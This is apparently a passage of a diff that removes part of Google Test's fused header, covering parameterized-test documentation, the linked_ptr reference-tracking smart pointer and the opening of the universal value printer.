-  // You can implement all the usual class fixture members here.
-};
-
-// Then, use the TEST_P macro to define as many parameterized tests
-// for this fixture as you want. The _P suffix is for "parameterized"
-// or "pattern", whichever you prefer to think.
-
-TEST_P(FooTest, DoesBlah) {
-  // Inside a test, access the test parameter with the GetParam() method
-  // of the TestWithParam<T> class:
-  EXPECT_TRUE(foo.Blah(GetParam()));
-  ...
-}
-
-TEST_P(FooTest, HasBlahBlah) {
-  ...
-}
-
-// Finally, you can use INSTANTIATE_TEST_CASE_P to instantiate the test
-// case with any set of parameters you want. Google Test defines a number
-// of functions for generating test parameters. They return what we call
-// (surprise!) parameter generators. Here is a  summary of them, which
-// are all in the testing namespace:
-//
-//
-//  Range(begin, end [, step]) - Yields values {begin, begin+step,
-//                               begin+step+step, ...}. The values do not
-//                               include end. step defaults to 1.
-//  Values(v1, v2, ..., vN)    - Yields values {v1, v2, ..., vN}.
-//  ValuesIn(container)        - Yields values from a C-style array, an STL
-//  ValuesIn(begin,end)          container, or an iterator range [begin, end).
-//  Bool()                     - Yields sequence {false, true}.
-//  Combine(g1, g2, ..., gN)   - Yields all combinations (the Cartesian product
-//                               for the math savvy) of the values generated
-//                               by the N generators.
-//
-// For more details, see comments at the definitions of these functions below
-// in this file.
-//
-// The following statement will instantiate tests from the FooTest test case
-// each with parameter values "meeny", "miny", and "moe".
-
-INSTANTIATE_TEST_CASE_P(InstantiationName,
-                        FooTest,
-                        Values("meeny", "miny", "moe"));
-
-// To distinguish different instances of the pattern, (yes, you
-// can instantiate it more then once) the first argument to the
-// INSTANTIATE_TEST_CASE_P macro is a prefix that will be added to the
-// actual test case name. Remember to pick unique prefixes for different
-// instantiations. The tests from the instantiation above will have
-// these names:
-//
-//    * InstantiationName/FooTest.DoesBlah/0 for "meeny"
-//    * InstantiationName/FooTest.DoesBlah/1 for "miny"
-//    * InstantiationName/FooTest.DoesBlah/2 for "moe"
-//    * InstantiationName/FooTest.HasBlahBlah/0 for "meeny"
-//    * InstantiationName/FooTest.HasBlahBlah/1 for "miny"
-//    * InstantiationName/FooTest.HasBlahBlah/2 for "moe"
-//
-// You can use these names in --gtest_filter.
-//
-// This statement will instantiate all tests from FooTest again, each
-// with parameter values "cat" and "dog":
-
-const char* pets[] = {"cat", "dog"};
-INSTANTIATE_TEST_CASE_P(AnotherInstantiationName, FooTest, ValuesIn(pets));
-
-// The tests from the instantiation above will have these names:
-//
-//    * AnotherInstantiationName/FooTest.DoesBlah/0 for "cat"
-//    * AnotherInstantiationName/FooTest.DoesBlah/1 for "dog"
-//    * AnotherInstantiationName/FooTest.HasBlahBlah/0 for "cat"
-//    * AnotherInstantiationName/FooTest.HasBlahBlah/1 for "dog"
-//
-// Please note that INSTANTIATE_TEST_CASE_P will instantiate all tests
-// in the given test case, whether their definitions come before or
-// AFTER the INSTANTIATE_TEST_CASE_P statement.
-//
-// Please also note that generator expressions (including parameters to the
-// generators) are evaluated in InitGoogleTest(), after main() has started.
-// This allows the user on one hand, to adjust generator parameters in order
-// to dynamically determine a set of tests to run and on the other hand,
-// give the user a chance to inspect the generated tests with Google Test
-// reflection API before RUN_ALL_TESTS() is executed.
-//
-// You can see samples/sample7_unittest.cc and samples/sample8_unittest.cc
-// for more examples.
-//
-// In the future, we plan to publish the API for defining new parameter
-// generators. But for now this interface remains part of the internal
-// implementation and is subject to change.
-//
-//
-// A parameterized test fixture must be derived from testing::Test and from
-// testing::WithParamInterface<T>, where T is the type of the parameter
-// values. Inheriting from TestWithParam<T> satisfies that requirement because
-// TestWithParam<T> inherits from both Test and WithParamInterface. In more
-// complicated hierarchies, however, it is occasionally useful to inherit
-// separately from Test and WithParamInterface. For example:
-
-class BaseTest : public ::testing::Test {
-  // You can inherit all the usual members for a non-parameterized test
-  // fixture here.
-};
-
-class DerivedTest : public BaseTest, public ::testing::WithParamInterface<int> {
-  // The usual test fixture members go here too.
-};
-
-TEST_F(BaseTest, HasFoo) {
-  // This is an ordinary non-parameterized test.
-}
-
-TEST_P(DerivedTest, DoesBlah) {
-  // GetParam works just the same here as if you inherit from TestWithParam.
-  EXPECT_TRUE(foo.Blah(GetParam()));
-}
-
-#endif  // 0
-
-
-#if !GTEST_OS_SYMBIAN
-# include <utility>
-#endif
-
-// scripts/fuse_gtest.py depends on gtest's own header being #included
-// *unconditionally*.  Therefore these #includes cannot be moved
-// inside #if GTEST_HAS_PARAM_TEST.
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: vladl@google.com (Vlad Losev)
-
-// Type and function utilities for implementing parameterized tests.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_H_
-
-#include <iterator>
-#include <utility>
-#include <vector>
-
-// scripts/fuse_gtest.py depends on gtest's own header being #included
-// *unconditionally*.  Therefore these #includes cannot be moved
-// inside #if GTEST_HAS_PARAM_TEST.
-// Copyright 2003 Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: Dan Egnor (egnor@google.com)
-//
-// A "smart" pointer type with reference tracking.  Every pointer to a
-// particular object is kept on a circular linked list.  When the last pointer
-// to an object is destroyed or reassigned, the object is deleted.
-//
-// Used properly, this deletes the object when the last reference goes away.
-// There are several caveats:
-// - Like all reference counting schemes, cycles lead to leaks.
-// - Each smart pointer is actually two pointers (8 bytes instead of 4).
-// - Every time a pointer is assigned, the entire list of pointers to that
-//   object is traversed.  This class is therefore NOT SUITABLE when there
-//   will often be more than two or three pointers to a particular object.
-// - References are only tracked as long as linked_ptr<> objects are copied.
-//   If a linked_ptr<> is converted to a raw pointer and back, BAD THINGS
-//   will happen (double deletion).
-//
-// A good use of this class is storing object references in STL containers.
-// You can safely put linked_ptr<> in a vector<>.
-// Other uses may not be as good.
-//
-// Note: If you use an incomplete type with linked_ptr<>, the class
-// *containing* linked_ptr<> must have a constructor and destructor (even
-// if they do nothing!).
-//
-// Bill Gibbons suggested we use something like this.
-//
-// Thread Safety:
-//   Unlike other linked_ptr implementations, in this implementation
-//   a linked_ptr object is thread-safe in the sense that:
-//     - it's safe to copy linked_ptr objects concurrently,
-//     - it's safe to copy *from* a linked_ptr and read its underlying
-//       raw pointer (e.g. via get()) concurrently, and
-//     - it's safe to write to two linked_ptrs that point to the same
-//       shared object concurrently.
-// TODO(wan@google.com): rename this to safe_linked_ptr to avoid
-// confusion with normal linked_ptr.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_LINKED_PTR_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_LINKED_PTR_H_
-
-#include <stdlib.h>
-#include <assert.h>
-
-
-namespace testing {
-namespace internal {
-
-// Protects copying of all linked_ptr objects.
-GTEST_API_ GTEST_DECLARE_STATIC_MUTEX_(g_linked_ptr_mutex);
-
-// This is used internally by all instances of linked_ptr<>.  It needs to be
-// a non-template class because different types of linked_ptr<> can refer to
-// the same object (linked_ptr<Superclass>(obj) vs linked_ptr<Subclass>(obj)).
-// So, it needs to be possible for different types of linked_ptr to participate
-// in the same circular linked list, so we need a single class type here.
-//
-// DO NOT USE THIS CLASS DIRECTLY YOURSELF.  Use linked_ptr<T>.
-class linked_ptr_internal {
- public:
-  // Create a new circle that includes only this instance.
-  void join_new() {
-    next_ = this;
-  }
-
-  // Many linked_ptr operations may change p.link_ for some linked_ptr
-  // variable p in the same circle as this object.  Therefore we need
-  // to prevent two such operations from occurring concurrently.
-  //
-  // Note that different types of linked_ptr objects can coexist in a
-  // circle (e.g. linked_ptr<Base>, linked_ptr<Derived1>, and
-  // linked_ptr<Derived2>).  Therefore we must use a single mutex to
-  // protect all linked_ptr objects.  This can create serious
-  // contention in production code, but is acceptable in a testing
-  // framework.
-
-  // Join an existing circle.
-  void join(linked_ptr_internal const* ptr)
-      GTEST_LOCK_EXCLUDED_(g_linked_ptr_mutex) {
-    MutexLock lock(&g_linked_ptr_mutex);
-
-    linked_ptr_internal const* p = ptr;
-    while (p->next_ != ptr) {
-      assert(p->next_ != this &&
-             "Trying to join() a linked ring we are already in. "
-             "Is GMock thread safety enabled?");
-      p = p->next_;
-    }
-    p->next_ = this;
-    next_ = ptr;
-  }
-
-  // Leave whatever circle we're part of.  Returns true if we were the
-  // last member of the circle.  Once this is done, you can join() another.
-  bool depart()
-      GTEST_LOCK_EXCLUDED_(g_linked_ptr_mutex) {
-    MutexLock lock(&g_linked_ptr_mutex);
-
-    if (next_ == this) return true;
-    linked_ptr_internal const* p = next_;
-    while (p->next_ != this) {
-      assert(p->next_ != next_ &&
-             "Trying to depart() a linked ring we are not in. "
-             "Is GMock thread safety enabled?");
-      p = p->next_;
-    }
-    p->next_ = next_;
-    return false;
-  }
-
- private:
-  mutable linked_ptr_internal const* next_;
-};
-
-template <typename T>
-class linked_ptr {
- public:
-  typedef T element_type;
-
-  // Take over ownership of a raw pointer.  This should happen as soon as
-  // possible after the object is created.
-  explicit linked_ptr(T* ptr = NULL) { capture(ptr); }
-  ~linked_ptr() { depart(); }
-
-  // Copy an existing linked_ptr<>, adding ourselves to the list of references.
-  template <typename U> linked_ptr(linked_ptr<U> const& ptr) { copy(&ptr); }
-  linked_ptr(linked_ptr const& ptr) {  // NOLINT
-    assert(&ptr != this);
-    copy(&ptr);
-  }
-
-  // Assignment releases the old value and acquires the new.
-  template <typename U> linked_ptr& operator=(linked_ptr<U> const& ptr) {
-    depart();
-    copy(&ptr);
-    return *this;
-  }
-
-  linked_ptr& operator=(linked_ptr const& ptr) {
-    if (&ptr != this) {
-      depart();
-      copy(&ptr);
-    }
-    return *this;
-  }
-
-  // Smart pointer members.
-  void reset(T* ptr = NULL) {
-    depart();
-    capture(ptr);
-  }
-  T* get() const { return value_; }
-  T* operator->() const { return value_; }
-  T& operator*() const { return *value_; }
-
-  bool operator==(T* p) const { return value_ == p; }
-  bool operator!=(T* p) const { return value_ != p; }
-  template <typename U>
-  bool operator==(linked_ptr<U> const& ptr) const {
-    return value_ == ptr.get();
-  }
-  template <typename U>
-  bool operator!=(linked_ptr<U> const& ptr) const {
-    return value_ != ptr.get();
-  }
-
- private:
-  template <typename U>
-  friend class linked_ptr;
-
-  T* value_;
-  linked_ptr_internal link_;
-
-  void depart() {
-    if (link_.depart()) delete value_;
-  }
-
-  void capture(T* ptr) {
-    value_ = ptr;
-    link_.join_new();
-  }
-
-  template <typename U> void copy(linked_ptr<U> const* ptr) {
-    value_ = ptr->get();
-    if (value_)
-      link_.join(&ptr->link_);
-    else
-      link_.join_new();
-  }
-};
-
-template<typename T> inline
-bool operator==(T* ptr, const linked_ptr<T>& x) {
-  return ptr == x.get();
-}
-
-template<typename T> inline
-bool operator!=(T* ptr, const linked_ptr<T>& x) {
-  return ptr != x.get();
-}
-
-// A function to convert T* into linked_ptr<T>
-// Doing e.g. make_linked_ptr(new FooBarBaz<type>(arg)) is a shorter notation
-// for linked_ptr<FooBarBaz<type> >(new FooBarBaz<type>(arg))
-template <typename T>
-linked_ptr<T> make_linked_ptr(T* ptr) {
-  return linked_ptr<T>(ptr);
-}
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_LINKED_PTR_H_
-// Copyright 2007, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-// Google Test - The Google C++ Testing Framework
-//
-// This file implements a universal value printer that can print a
-// value of any type T:
-//
-//   void ::testing::internal::UniversalPrinter<T>::Print(value, ostream_ptr);
-//
-// A user can teach this function how to print a class type T by
-// defining either operator<<() or PrintTo() in the namespace that
-// defines T.  More specifically, the FIRST defined function in the
-// following list will be used (assuming T is defined in namespace
-// foo):
-//
-//   1. foo::PrintTo(const T&, ostream*)
-//   2. operator<<(ostream&, const T&) defined in either foo or the
-//      global namespace.
-//
-// If none of the above is defined, it will print the debug string of
-// the value if it is a protocol buffer, or print the raw bytes in the
-// value otherwise.
-//
-// To aid debugging: when T is a reference type, the address of the
-// value is also printed; when T is a (const) char pointer, both the
-// pointer value and the NUL-terminated string it points to are
-// printed.
-//
-// We also provide some convenient wrappers:
-//
-//   // Prints a value to a string.  For a (const or not) char
-//   // pointer, the NUL-terminated string (but not the pointer) is
-//   // printed.
-//   std::string ::testing::PrintToString(const T& value);
-//
-//   // Prints a value tersely: for a reference type, the referenced
-//   // value (but not the address) is printed; for a (const or not) char
-//   // pointer, the NUL-terminated string (but not the pointer) is
-//   // printed.
-//   void ::testing::internal::UniversalTersePrint(const T& value, ostream*);
-//
-//   // Prints value using the type inferred by the compiler.  The difference
-//   // from UniversalTersePrint() is that this function prints both the
-//   // pointer and the NUL-terminated string for a (const or not) char pointer.
-//   void ::testing::internal::UniversalPrint(const T& value, ostream*);
-//
-//   // Prints the fields of a tuple tersely to a string vector, one
-//   // element for each field. Tuple support must be enabled in
-//   // gtest-port.h.
-//   std::vector<string> UniversalTersePrintTupleFieldsToStrings(
-//       const Tuple& value);
-//
-// Known limitation:
-//
-// The print primitives print the elements of an STL-style container
-// using the compiler-inferred type of *iter where iter is a
-// const_iterator of the container.  When const_iterator is an input
-// iterator but not a forward iterator, this inferred type may not
-// match value_type, and the print output may be incorrect.  In
-// practice, this is rarely a problem as for most containers
-// const_iterator is a forward iterator.  We'll fix this if there's an
-// actual need for it.  Note that this fix cannot rely on value_type
-// being defined as many user-defined container types don't have
-// value_type.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_PRINTERS_H_
-#define GTEST_INCLUDE_GTEST_GTEST_PRINTERS_H_
-
-#include <ostream>  // NOLINT
-#include <sstream>
-#include <string>
-#include <utility>
-#include <vector>
-
-#if GTEST_HAS_STD_TUPLE_
-# include <tuple>
-#endif
-
-namespace testing {
-
-// Definitions in the 'internal' and 'internal2' name spaces are
-// subject to change without notice.  DO NOT USE THEM IN USER CODE!
-namespace internal2 {
-
-// Prints the given number of bytes in the given object to the given
-// ostream.
-GTEST_API_ void PrintBytesInObjectTo(const unsigned char* obj_bytes,
-                                     size_t count,
-                                     ::std::ostream* os);
-
-// For selecting which printer to use when a given type has neither <<
-// nor PrintTo().
-enum TypeKind {
-  kProtobuf,              // a protobuf type
-  kConvertibleToInteger,  // a type implicitly convertible to BiggestInt
-                          // (e.g. a named or unnamed enum type)
-  kOtherType              // anything else
-};
-
-// TypeWithoutFormatter<T, kTypeKind>::PrintValue(value, os) is called
-// by the universal printer to print a value of type T when neither
-// operator<< nor PrintTo() is defined for T, where kTypeKind is the
-// "kind" of T as defined by enum TypeKind.
-template <typename T, TypeKind kTypeKind>
-class TypeWithoutFormatter {
- public:
-  // This default version is called when kTypeKind is kOtherType.
-  static void PrintValue(const T& value, ::std::ostream* os) {
-    PrintBytesInObjectTo(reinterpret_cast<const unsigned char*>(&value),
-                         sizeof(value), os);
-  }
-};
-
-// We print a protobuf using its ShortDebugString() when the string
-// doesn't exceed this many characters; otherwise we print it using
-// DebugString() for better readability.
-const size_t kProtobufOneLinerMaxLength = 50;
-
-template <typename T>
-class TypeWithoutFormatter<T, kProtobuf> {
- public:
-  static void PrintValue(const T& value, ::std::ostream* os) {
-    const ::testing::internal::string short_str = value.ShortDebugString();
-    const ::testing::internal::string pretty_str =
-        short_str.length() <= kProtobufOneLinerMaxLength ?
-        short_str : ("\n" + value.DebugString());
-    *os << ("<" + pretty_str + ">");
-  }
-};
-
-template <typename T>
-class TypeWithoutFormatter<T, kConvertibleToInteger> {
- public:
-  // Since T has no << operator or PrintTo() but can be implicitly
-  // converted to BiggestInt, we print it as a BiggestInt.
-  //
-  // Most likely T is an enum type (either named or unnamed), in which
-  // case printing it as an integer is the desired behavior.  In case
-  // T is not an enum, printing it as an integer is the best we can do
-  // given that it has no user-defined printer.
-  static void PrintValue(const T& value, ::std::ostream* os) {
-    const internal::BiggestInt kBigInt = value;
-    *os << kBigInt;
-  }
-};
-
-// Prints the given value to the given ostream.  If the value is a
-// protocol message, its debug string is printed; if it's an enum or
-// of a type implicitly convertible to BiggestInt, it's printed as an
-// integer; otherwise the bytes in the value are printed.  This is
-// what UniversalPrinter<T>::Print() does when it knows nothing about
-// type T and T has neither << operator nor PrintTo().
-//
-// A user can override this behavior for a class type Foo by defining
-// a << operator in the namespace where Foo is defined.
-//
-// We put this operator in namespace 'internal2' instead of 'internal'
-// to simplify the implementation, as much code in 'internal' needs to
-// use << in STL, which would conflict with our own << were it defined
-// in 'internal'.
-//
-// Note that this operator<< takes a generic std::basic_ostream<Char,
-// CharTraits> type instead of the more restricted std::ostream.  If
-// we define it to take an std::ostream instead, we'll get an
-// "ambiguous overloads" compiler error when trying to print a type
-// Foo that supports streaming to std::basic_ostream<Char,
-// CharTraits>, as the compiler cannot tell whether
-// operator<<(std::ostream&, const T&) or
-// operator<<(std::basic_stream<Char, CharTraits>, const Foo&) is more
-// specific.
-template <typename Char, typename CharTraits, typename T>
-::std::basic_ostream<Char, CharTraits>& operator<<(
-    ::std::basic_ostream<Char, CharTraits>& os, const T& x) {
-  TypeWithoutFormatter<T,
-      (internal::IsAProtocolMessage<T>::value ? kProtobuf :
-       internal::ImplicitlyConvertible<const T&, internal::BiggestInt>::value ?
-       kConvertibleToInteger : kOtherType)>::PrintValue(x, &os);
-  return os;
-}
-
-}  // namespace internal2
-}  // namespace testing
-
-// This namespace MUST NOT BE NESTED IN ::testing, or the name look-up
-// magic needed for implementing UniversalPrinter won't work.
-namespace testing_internal {
-
-// Used to print a value that is not an STL-style container when the
-// user doesn't define PrintTo() for it.
-template <typename T>
-void DefaultPrintNonContainerTo(const T& value, ::std::ostream* os) {
-  // With the following statement, during unqualified name lookup,
-  // testing::internal2::operator<< appears as if it was declared in
-  // the nearest enclosing namespace that contains both
-  // ::testing_internal and ::testing::internal2, i.e. the global
-  // namespace.  For more details, refer to the C++ Standard section
-  // 7.3.4-1 [namespace.udir].  This allows us to fall back onto
-  // testing::internal2::operator<< in case T doesn't come with a <<
-  // operator.
-  //
-  // We cannot write 'using ::testing::internal2::operator<<;', which
-  // gcc 3.3 fails to compile due to a compiler bug.
-  using namespace ::testing::internal2;  // NOLINT
-
-  // Assuming T is defined in namespace foo, in the next statement,
-  // the compiler will consider all of:
-  //
-  //   1. foo::operator<< (thanks to Koenig look-up),
-  //   2. ::operator<< (as the current namespace is enclosed in ::),
-  //   3. testing::internal2::operator<< (thanks to the using statement above).
-  //
-  // The operator<< whose type matches T best will be picked.
-  //
-  // We deliberately allow #2 to be a candidate, as sometimes it's
-  // impossible to define #1 (e.g. when foo is ::std, defining
-  // anything in it is undefined behavior unless you are a compiler
-  // vendor.).
-  *os << value;
-}
-
-}  // namespace testing_internal
-
-namespace testing {
-namespace internal {
-
-// UniversalPrinter<T>::Print(value, ostream_ptr) prints the given
-// value to the given ostream.  The caller must ensure that
-// 'ostream_ptr' is not NULL, or the behavior is undefined.
-//
-// We define UniversalPrinter as a class template (as opposed to a
-// function template), as we need to partially specialize it for
-// reference types, which cannot be done with function templates.
-template <typename T>
-class UniversalPrinter;
-
-template <typename T>
-void UniversalPrint(const T& value, ::std::ostream* os);
-
-// Used to print an STL-style container when the user doesn't define
-// a PrintTo() for it.
-template <typename C>
-void DefaultPrintTo(IsContainer /* dummy */,
-                    false_type /* is not a pointer */,
-                    const C& container, ::std::ostream* os) {
-  const size_t kMaxCount = 32;  // The maximum number of elements to print.
-  *os << '{';
-  size_t count = 0;
-  for (typename C::const_iterator it = container.begin();
-       it != container.end(); ++it, ++count) {
-    if (count > 0) {
-      *os << ',';
-      if (count == kMaxCount) {  // Enough has been printed.
-        *os << " ...";
-        break;
-      }
-    }
-    *os << ' ';
-    // We cannot call PrintTo(*it, os) here as PrintTo() doesn't
-    // handle *it being a native array.
-    internal::UniversalPrint(*it, os);
-  }
-
-  if (count > 0) {
-    *os << ' ';
-  }
-  *os << '}';
-}
-
-// Used to print a pointer that is neither a char pointer nor a member
-// pointer, when the user doesn't define PrintTo() for it.  (A member
-// variable pointer or member function pointer doesn't really point to
-// a location in the address space.  Their representation is
-// implementation-defined.  Therefore they will be printed as raw
-// bytes.)
-template <typename T>
-void DefaultPrintTo(IsNotContainer /* dummy */,
-                    true_type /* is a pointer */,
-                    T* p, ::std::ostream* os) {
-  if (p == NULL) {
-    *os << "NULL";
-  } else {
-    // C++ doesn't allow casting from a function pointer to any object
-    // pointer.
-    //
-    // IsTrue() silences warnings: "Condition is always true",
-    // "unreachable code".
-    if (IsTrue(ImplicitlyConvertible<T*, const void*>::value)) {
-      // T is not a function type.  We just call << to print p,
-      // relying on ADL to pick up user-defined << for their pointer
-      // types, if any.
-      *os << p;
-    } else {
-      // T is a function type, so '*os << p' doesn't do what we want
-      // (it just prints p as bool).  We want to print p as a const
-      // void*.  However, we cannot cast it to const void* directly,
-      // even using reinterpret_cast, as earlier versions of gcc
-      // (e.g. 3.4.5) cannot compile the cast when p is a function
-      // pointer.  Casting to UInt64 first solves the problem.
-      *os << reinterpret_cast<const void*>(
-          reinterpret_cast<internal::UInt64>(p));
-    }
-  }
-}
-
-// Used to print a non-container, non-pointer value when the user
-// doesn't define PrintTo() for it.
-template <typename T>
-void DefaultPrintTo(IsNotContainer /* dummy */,
-                    false_type /* is not a pointer */,
-                    const T& value, ::std::ostream* os) {
-  ::testing_internal::DefaultPrintNonContainerTo(value, os);
-}
-
-// Prints the given value using the << operator if it has one;
-// otherwise prints the bytes in it.  This is what
-// UniversalPrinter<T>::Print() does when PrintTo() is not specialized
-// or overloaded for type T.
-//
-// A user can override this behavior for a class type Foo by defining
-// an overload of PrintTo() in the namespace where Foo is defined.  We
-// give the user this option as sometimes defining a << operator for
-// Foo is not desirable (e.g. the coding style may prevent doing it,
-// or there is already a << operator but it doesn't do what the user
-// wants).
-template <typename T>
-void PrintTo(const T& value, ::std::ostream* os) {
-  // DefaultPrintTo() is overloaded.  The type of its first two
-  // arguments determine which version will be picked.  If T is an
-  // STL-style container, the version for container will be called; if
-  // T is a pointer, the pointer version will be called; otherwise the
-  // generic version will be called.
-  //
-  // Note that we check for container types here, prior to we check
-  // for protocol message types in our operator<<.  The rationale is:
-  //
-  // For protocol messages, we want to give people a chance to
-  // override Google Mock's format by defining a PrintTo() or
-  // operator<<.  For STL containers, other formats can be
-  // incompatible with Google Mock's format for the container
-  // elements; therefore we check for container types here to ensure
-  // that our format is used.
-  //
-  // The second argument of DefaultPrintTo() is needed to bypass a bug
-  // in Symbian's C++ compiler that prevents it from picking the right
-  // overload between:
-  //
-  //   PrintTo(const T& x, ...);
-  //   PrintTo(T* x, ...);
-  DefaultPrintTo(IsContainerTest<T>(0), is_pointer<T>(), value, os);
-}
-
-// The following list of PrintTo() overloads tells
-// UniversalPrinter<T>::Print() how to print standard types (built-in
-// types, strings, plain arrays, and pointers).
-
-// Overloads for various char types.
-GTEST_API_ void PrintTo(unsigned char c, ::std::ostream* os);
-GTEST_API_ void PrintTo(signed char c, ::std::ostream* os);
-inline void PrintTo(char c, ::std::ostream* os) {
-  // When printing a plain char, we always treat it as unsigned.  This
-  // way, the output won't be affected by whether the compiler thinks
-  // char is signed or not.
-  PrintTo(static_cast<unsigned char>(c), os);
-}
-
-// Overloads for other simple built-in types.
-inline void PrintTo(bool x, ::std::ostream* os) {
-  *os << (x ? "true" : "false");
-}
-
-// Overload for wchar_t type.
-// Prints a wchar_t as a symbol if it is printable or as its internal
-// code otherwise and also as its decimal code (except for L'\0').
-// The L'\0' char is printed as "L'\\0'". The decimal code is printed
-// as signed integer when wchar_t is implemented by the compiler
-// as a signed type and is printed as an unsigned integer when wchar_t
-// is implemented as an unsigned type.
-GTEST_API_ void PrintTo(wchar_t wc, ::std::ostream* os);
-
-// Overloads for C strings.
-GTEST_API_ void PrintTo(const char* s, ::std::ostream* os);
-inline void PrintTo(char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const char*>(s), os);
-}
-
-// signed/unsigned char is often used for representing binary data, so
-// we print pointers to it as void* to be safe.
-inline void PrintTo(const signed char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const void*>(s), os);
-}
-inline void PrintTo(signed char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const void*>(s), os);
-}
-inline void PrintTo(const unsigned char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const void*>(s), os);
-}
-inline void PrintTo(unsigned char* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const void*>(s), os);
-}
-
-// MSVC can be configured to define wchar_t as a typedef of unsigned
-// short.  It defines _NATIVE_WCHAR_T_DEFINED when wchar_t is a native
-// type.  When wchar_t is a typedef, defining an overload for const
-// wchar_t* would cause unsigned short* be printed as a wide string,
-// possibly causing invalid memory accesses.
-#if !defined(_MSC_VER) || defined(_NATIVE_WCHAR_T_DEFINED)
-// Overloads for wide C strings
-GTEST_API_ void PrintTo(const wchar_t* s, ::std::ostream* os);
-inline void PrintTo(wchar_t* s, ::std::ostream* os) {
-  PrintTo(ImplicitCast_<const wchar_t*>(s), os);
-}
-#endif
-
-// Overload for C arrays.  Multi-dimensional arrays are printed
-// properly.
-
-// Prints the given number of elements in an array, without printing
-// the curly braces.
-template <typename T>
